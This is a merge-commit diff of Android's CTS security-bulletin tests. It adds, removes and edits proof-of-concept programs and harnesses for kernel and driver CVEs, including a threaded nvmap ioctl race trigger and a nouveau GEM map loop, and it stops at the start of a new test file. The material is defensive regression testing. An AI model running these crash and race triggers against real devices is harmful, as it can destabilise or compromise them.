DO NOT MERGE - Merge pi-dev@5234907 into stage-aosp-master
Bug: 120848293
Change-Id: I4029675ab6a04d36baf8a44fa4aba3453b38a1c0
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index cbb94ca..0f61403 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -27,7 +27,6 @@
<option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
<option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
<option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
- <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
<option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
<option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
<option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
@@ -55,18 +54,12 @@
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<!--__________________-->
- <!-- Bulletin 2016-06 -->
- <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2016-2062->/data/local/tmp/CVE-2016-2062" />
-
- <!--__________________-->
<!-- Bulletin 2016-07 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2016-3818->/data/local/tmp/CVE-2016-3818" />
<!-- Bulletin 2016-09 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2015-8839->/data/local/tmp/CVE-2015-8839" />
<option name="push" value="CVE-2016-2471->/data/local/tmp/CVE-2016-2471" />
<!--__________________-->
diff --git a/hostsidetests/securitybulletin/res/cve_2016_3916.apk b/hostsidetests/securitybulletin/res/cve_2016_3916.apk
deleted file mode 100644
index 96c6128..0000000
--- a/hostsidetests/securitybulletin/res/cve_2016_3916.apk
+++ /dev/null
Binary files differ
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk
deleted file mode 100755
index 65fe025..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk
+++ /dev/null
@@ -1,36 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2015-8839
-LOCAL_SRC_FILES := poc.c
-
-LOCAL_SHARED_LIBRARIES := libcutils \
- liblog
-
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts sts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror
-LOCAL_LDFLAGS += -fPIE -pie
-LOCAL_LDFLAGS += -rdynamic
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c
deleted file mode 100755
index c6a330f..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c
+++ /dev/null
@@ -1,59 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-#include <cutils/log.h>
-#include <errno.h>
-#include <fcntl.h>
-#include <linux/falloc.h>
-#include <linux/magic.h>
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/types.h>
-#include <sys/utsname.h>
-#include <sys/vfs.h>
-#include <unistd.h>
-
-int main(void) {
- int fd = -1, result = -1;
- char tmpFile[32];
- struct statfs sfs;
-
- memset(tmpFile, 0, sizeof(tmpFile));
- strncpy(tmpFile, "/data/local/tmp/tmpFile", 24);
-
- fd = open(tmpFile, O_WRONLY | O_APPEND | O_CREAT, 0644);
- if (fd < 0) {
- ALOGE("Creation of tmp file is failed [%s]", strerror(errno));
- return -1;
- }
-
- fstatfs(fd, &sfs);
- if (sfs.f_type == EXT4_SUPER_MAGIC) {
- result = fallocate(fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, 1);
- if (result < 0 && errno == EOPNOTSUPP) {
- ALOGD("fallocate result [%s] errno [%d]", strerror(errno), errno);
- ALOGE("fallocate result EOPNOTSUPP");
- }
- }
-
- if (fd) {
- close(fd);
- }
-
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/Android.mk
deleted file mode 100644
index 204ace1..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-8424
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests sts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wno-unused-parameter -Wall -Werror
-LOCAL_CFLAGS += -Wno-incompatible-pointer-types -Wno-unused-variable
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/poc.c
deleted file mode 100644
index 4460b88..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/poc.c
+++ /dev/null
@@ -1,138 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-
-#include <stdlib.h>
-#include <errno.h>
-#include <unistd.h>
-#include <stdio.h>
-#include <dirent.h>
-#include <string.h>
-#include <sys/stat.h>
-#include <sys/ioctl.h>
-#include <stdio.h>
-#include <string.h>
-#include <dlfcn.h>
-#include <sys/time.h>
-#include <sys/mman.h>
-#include <sys/syscall.h>
-#include <sys/resource.h>
-#include <fcntl.h>
-#include <pthread.h>
-#include <unistd.h>
-#include <sched.h>
-
-
-struct nvmap_handle_param {
- __u32 handle; /* nvmap handle */
- __u32 param; /* size/align/base/heap etc. */
- unsigned long result; /* returns requested info*/
-};
-
-struct nvmap_create_handle {
- union {
- __u32 id; /* FromId */
- __u32 size; /* CreateHandle */
- __s32 fd; /* DmaBufFd or FromFd */
- };
- __u32 handle; /* returns nvmap handle */
-};
-
-#define NVMAP_IOC_MAGIC 'N'
-#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
-#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
-#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
-#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
-#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
-
-int g_fd = -1;
-static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
-static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
-struct nvmap_create_handle* g_allocation = NULL;
-
-int open_driver() {
- char* dev_path = "/dev/nvmap";
- g_fd = open(dev_path, O_RDWR);
- if (g_fd < 0) {
- printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
- } else {
- printf("[*] open file(%s) succ!\n", dev_path);
- }
- return g_fd;
-}
-
-void trigger_nvmap_create() {
- ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
- //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
-}
-
-void trigger_nvmap_free() {
- static int data = 1024;
- ioctl(g_fd, NVMAP_IOC_FREE, data);
- //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
-}
-
-void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
- setpriority(PRIO_PROCESS, gettid(), privi);
- printf("[*] setpriority(%d) errno = %d\n", privi, errno);
-
- /* bind process to a CPU*/
- if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
- printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
- }
-}
-
-void prepare_data() {
- void* data = calloc(1, 0x1000);
-
- g_allocation = (struct nvmap_create_handle*)data;
- g_allocation->size = 1024;
-
- mprotect(data, 0x1000, PROT_READ);
- printf("[*] mprotect, error = %d\n", errno);
-}
-static int init = 0;
-void* race_thread(void* arg) {
- setup_privi_and_affinity(0, 2);
-
- int i;
- while (1) {
- if (init == 0) {
- pthread_mutex_lock(&mutex);
- pthread_cond_wait(&cond, &mutex);
- pthread_mutex_unlock(&mutex);
- init = 1;
- }
- trigger_nvmap_free();
- }
-}
-
-int main(int argc, char**argv) {
- setup_privi_and_affinity(0, 1);
- if (open_driver() < 0) {
- return -1;
- }
- prepare_data();
- pthread_t tid;
- pthread_create(&tid, NULL, race_thread, NULL);
- sleep(1);
- while (1) {
- if (init == 0)
- pthread_cond_signal(&cond);
- trigger_nvmap_create();
- }
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk
index b4697d5..64ecb5c 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk
@@ -10,7 +10,7 @@
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
-# limitations under the License.
+# limitations under the License
LOCAL_PATH := $(call my-dir)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c
index 1637bd6..5bdd33d 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c
@@ -10,26 +10,25 @@
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions vand
+ * See the License for the specific language governing permissions and
* limitations under the License.
*/
#define _GNU_SOURCE
-#include "local_poc.h"
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
-#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
+#include "local_poc.h"
+#include "../includes/common.h"
#define DRMDEV_NAME "/dev/dri/renderD128"
+#define MAX_MAPS 10
-static int drm_version(int fd)
-{
- int ret;
+static int drm_version(int fd) {
struct drm_version ver;
ver.name_len = 100;
ver.date_len = 100;
@@ -39,17 +38,14 @@
ver.date = (char*)malloc(ver.date_len);
ver.desc = (char*)malloc(ver.desc_len);
- ret = ioctl(fd, DRM_IOCTL_VERSION, &ver);
-
- if (ret == -1) {
- return -1;
+ if (ioctl(fd, DRM_IOCTL_VERSION, &ver) < 0) {
+ close(fd);
+ exit(EXIT_FAILURE);
}
return 0;
}
-static int nouveau_gem_ioctl_new(int fd)
-{
- int ret;
+static uint32_t nouveau_gem_ioctl_new(int fd) {
struct drm_nouveau_gem_new new_arg;
memset(&new_arg, 0, sizeof(new_arg));
@@ -57,66 +53,43 @@
new_arg.info.size = 0x1000;
new_arg.info.domain = NOUVEAU_GEM_DOMAIN_GART;
- ret = ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_NEW, &new_arg);
- if (ret == -1) {
- return -1;
+ if (ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_NEW, &new_arg) < 0) {
+ close(fd);
+ exit(EXIT_FAILURE);
}
-
return new_arg.info.handle;
}
-static uint32_t get_gem_map_handle(int fd)
-{
- uint32_t handle;
-
- handle = nouveau_gem_ioctl_new(fd);
-
- return handle;
-}
-
-static void nouveau_gem_ioctl_map(int fd, uint32_t handle)
-{
- int ret;
+static void nouveau_gem_ioctl_map(int fd, uint32_t handle) {
struct drm_nouveau_gem_map map_arg;
memset(&map_arg, 0, sizeof(map_arg));
map_arg.handle = handle;
map_arg.length = 0x1000;
- ret = ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_MAP, &map_arg);
- if (ret == -1) {
- return;
+ if (ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_MAP, &map_arg) < 0) {
+ close(fd);
+ exit(EXIT_FAILURE);
}
}
-void poc()
-{
+int main() {
int fd;
- const int MAX_MAPS = 10;
+ time_t test_started = start_timer();
- fd = open(DRMDEV_NAME, O_RDWR);
- if (fd == -1) {
- return;
+ while (timer_active(test_started)) {
+ fd = open(DRMDEV_NAME, O_RDWR);
+ if (fd < 0) {
+ return -1;
+ }
+
+ drm_version(fd);
+
+ uint32_t handle = nouveau_gem_ioctl_new(fd);
+
+ for (int i = 0; i < MAX_MAPS; i++) {
+ nouveau_gem_ioctl_map(fd, handle);
+ }
+ close(fd);
}
-
- if (drm_version(fd) == -1){
- return;
- }
-
- uint32_t handle = get_gem_map_handle(fd);
-
- for(int i = 0; i < MAX_MAPS; i++){
- nouveau_gem_ioctl_map(fd, handle);
- }
- close(fd);
-
- return;
-}
-
-int main()
-{
- const int MAX_RUNS = 30000;
-
- for(int i = 0; i < MAX_RUNS; i++) {
- poc();
- }
+ return 0;
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
index c1f998d..b9f3b2b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
@@ -32,8 +32,6 @@
import static org.junit.Assert.*;
-import static org.junit.Assert.*;
-
public class AdbUtils {
/** Runs a commandline on the specified device
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
index e11c523..1e33083 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
@@ -28,13 +28,14 @@
}
/**
- * b/27532522
+ * b/27890802
*/
@SecurityTest(minPatchLevel = "2016-07")
- public void testPocCVE_2016_3809() throws Exception {
- AdbUtils.runCommandLine("logcat -c", getDevice());
- AdbUtils.runPoc("CVE-2016-3809", getDevice(), 60);
+ public void testPocCVE_2016_3746() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPoc("CVE-2016-3746", getDevice(), 60);
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*CVE-2016-3809 test case failed[\\s\\n\\S]*", logcat);
+ assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> /system/bin/mediaserver <<<",
+ logcat);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
index 9ae9d99..3280a68 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
@@ -26,15 +26,4 @@
public void testPocCVE_2016_2471() throws Exception {
AdbUtils.runPoc("CVE-2016-2471", getDevice(), 60);
}
-
- /**
- * b/28760453
- */
- @SecurityTest(minPatchLevel = "2016-09")
- public void testPocCVE_2015_8839() throws Exception {
- AdbUtils.runCommandLine("logcat -c" , getDevice());
- AdbUtils.runPoc("CVE-2015-8839", getDevice(), 60);
- String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertMatches("[\\s\\n\\S]*fallocate result EOPNOTSUPP[\\s\\n\\S]*", logcat);
- }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java
deleted file mode 100644
index 4999e55..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java
+++ /dev/null
@@ -1,113 +0,0 @@
-/**
- * Copyright (C) 2016 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-
-@SecurityTest
-public class Poc16_10 extends SecurityTestCase {
-
- /**
- * b/30904789
- */
- @SecurityTest
- public void testPocCVE_2016_6730() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
- }
- }
-
- /**
- * b/30906023
- */
- @SecurityTest
- public void testPocCVE_2016_6731() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
- }
- }
-
- /**
- * b/30906599
- */
- @SecurityTest
- public void testPocCVE_2016_6732() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
- }
- }
-
- /**
- * b/30906694
- */
- @SecurityTest
- public void testPocCVE_2016_6733() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
- }
- }
-
- /**
- * b/30907120
- */
- @SecurityTest
- public void testPocCVE_2016_6734() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
- }
- }
-
- /**
- * b/30907701
- */
- @SecurityTest
- public void testPocCVE_2016_6735() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
- }
- }
-
- /**
- * b/30953284
- */
- @SecurityTest
- public void testPocCVE_2016_6736() throws Exception {
- if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
- AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
- }
- }
-
- /**
- * b/30741779
- */
- @SecurityTest(minPatchLevel = "2016-10")
- public void testPocCVE_2016_3916() throws Exception {
- AdbUtils.installApk("/cve_2016_3916.apk", getDevice());
- AdbUtils.runCommandLine("logcat -c" , getDevice());
-
- AdbUtils.runCommandLine("am start -n com.trendmicro.wish_wu.camera2/" +
- "com.trendmicro.wish_wu.camera2.Camera2TestActivity", getDevice());
- Thread.sleep(10000);
- String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*Fatal signal 11 \\(SIGSEGV\\)" +
- "[\\s\\n\\S]*>>> /system/bin/" +
- "mediaserver <<<[\\s\\n\\S]*", logcat);
-
- //make sure the app is uninstalled after the test
- AdbUtils.runCommandLine("pm uninstall com.trendmicro.wish_wu.camera2" , getDevice());
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
index d1c42da..b6bb97b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
@@ -13,6 +13,7 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
+
package android.security.cts;
import android.platform.test.annotations.SecurityTest;
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
index 0956581..0239883 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
@@ -66,8 +66,8 @@
public void testPocCVE_2017_0334() throws Exception {
if (containsDriver(getDevice(), "/dev/dri/renderD129")) {
String out = AdbUtils.runPoc("CVE-2017-0334", getDevice());
- assertNotMatchesMultiLine(".*Leaked ptr is (0x[fF]{6}[cC]0[a-fA-F0-9]{8}"
- +"|0x[c-fC-F][a-fA-F0-9]{7}).*",out);
+ assertNotMatchesMultiLine("Leaked ptr is (0x[fF]{6}[cC]0[a-fA-F0-9]{8}"
+ +"|0x[c-fC-F][a-fA-F0-9]{7})",out);
}
}
@@ -79,8 +79,8 @@
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPocNoOutput("CVE-2017-0479", getDevice(), 60);
String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatchesMultiLine(".*Fatal signal 11 \\(SIGSEGV\\).*>>> /system/bin/" +
- "audioserver <<<.*", logcatOut);
+ assertNotMatchesMultiLine("Fatal signal 11 \\(SIGSEGV\\).*>>> /system/bin/" +
+ "audioserver <<<", logcatOut);
}
/*
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
index ae83bcb..248e257 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
@@ -47,7 +47,7 @@
@SecurityTest(minPatchLevel = "2017-04")
public void testPocCVE_2016_10229() throws Exception {
String out = AdbUtils.runPoc("CVE-2016-10229", getDevice());
- assertNotMatchesMultiLine(".*OVERWRITE.*", out);
+ assertNotMatchesMultiLine("OVERWRITE", out);
}
/**
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
deleted file mode 100644
index 87f6fde..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
+++ /dev/null
@@ -1,35 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-
-@SecurityTest
-public class Poc17_05 extends SecurityTestCase {
-
- /**
- * b/34277115
- */
- @SecurityTest(minPatchLevel = "2017-05")
- public void testPocCVE_2017_0630() throws Exception {
- if (containsDriver(getDevice(), "/sys/kernel/debug/tracing/printk_formats")) {
- String commandOutput = AdbUtils.runCommandLine("cat /sys/kernel/debug/tracing" +
- "/printk_formats", getDevice());
- assertNotMatchesMultiLine(".*0x(?!0){8,16}[0-9a-fA-F]{8,16} : .*", commandOutput);
- }
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
index 7c0936a..67becec 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
@@ -27,7 +27,7 @@
@SecurityTest(minPatchLevel = "2017-12")
public void testPocCVE_2017_6262() throws Exception {
if(containsDriver(getDevice(),"/dev/dri/renderD128")) {
- AdbUtils.runPocNoOutput("CVE-2017-6262", getDevice(), 900);
+ AdbUtils.runPocNoOutput("CVE-2017-6262", getDevice(), 300);
}
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
index a8af91a..4bf7b80 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
@@ -26,6 +26,6 @@
@SecurityTest(minPatchLevel = "2018-03")
public void testPocCVE_2017_13253() throws Exception {
String output = AdbUtils.runPoc("CVE-2017-13253", getDevice());
- assertNotMatchesMultiLine(".*OVERFLOW DETECTED.*",output);
+ assertNotMatchesMultiLine("OVERFLOW DETECTED",output);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
new file mode 100644
index 0000000..02436e7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
@@ -0,0 +1,32 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.runner.RunWith;
+
+public class Poc18_04 extends SecurityTestCase {
+ /**
+ * b/69683251
+ * Does not require root but must be a hostside test to avoid
+ * a race condition
+ */
+ @SecurityTest(minPatchLevel = "2018-04")
+ public void testPocCVE_2017_13286() throws Exception {
+ LaunchSomeWhere.launchSomeWhere("CVE_2017_13286", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
new file mode 100644
index 0000000..9e50e1e
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
@@ -0,0 +1,34 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+import static org.junit.Assert.*;
+
+@SecurityTest
+public class Poc18_11 extends SecurityTestCase {
+
+ /**
+ * b/111330641
+ */
+ @SecurityTest(minPatchLevel = "2018-11")
+ public void testPocCVE_2018_9525() throws Exception {
+ assertTrue(AdbUtils.runCommandGetExitCode(
+ "pm dump com.android.settings | grep SliceBroadcastReceiver", getDevice()) != 0);
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java
new file mode 100644
index 0000000..752b06d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java
@@ -0,0 +1,78 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
